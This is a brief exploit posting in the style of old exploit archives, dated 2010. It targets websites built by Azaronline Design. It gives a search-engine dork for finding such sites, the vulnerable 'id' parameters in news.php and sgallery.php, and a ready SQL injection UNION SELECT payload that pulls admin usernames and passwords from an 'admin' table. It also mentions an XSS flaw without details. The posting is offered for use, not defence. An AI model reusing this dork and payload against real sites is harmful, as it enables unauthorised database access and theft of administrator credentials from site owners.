########################################################################
# Name: Azaronline Design SQL Injection Vulnerability
# Vendor: http://azaronline.com
# Date: 2010-11-02
# Author: XroGuE
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: Inj3ct0r.com
########################################################################
########################################################################
  
[+] Dork: intext:"Powered By Azaronline.com"
  
########################################################################
  
[+] SQL InjecTion Vulnerability:
  
[+] vuln: http://[site]/[path]/[news.php],[sgallery.php],[etc]?id=[SQLi]
 
[+] XPL : UNION all SELECT 1,2,group_Concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from admin
  
########################################################################
 
[+] XSS/HTML InjecTion Vulnerability:
 
[+] vuln: [SearCh And Find It :P]
 
########################################################################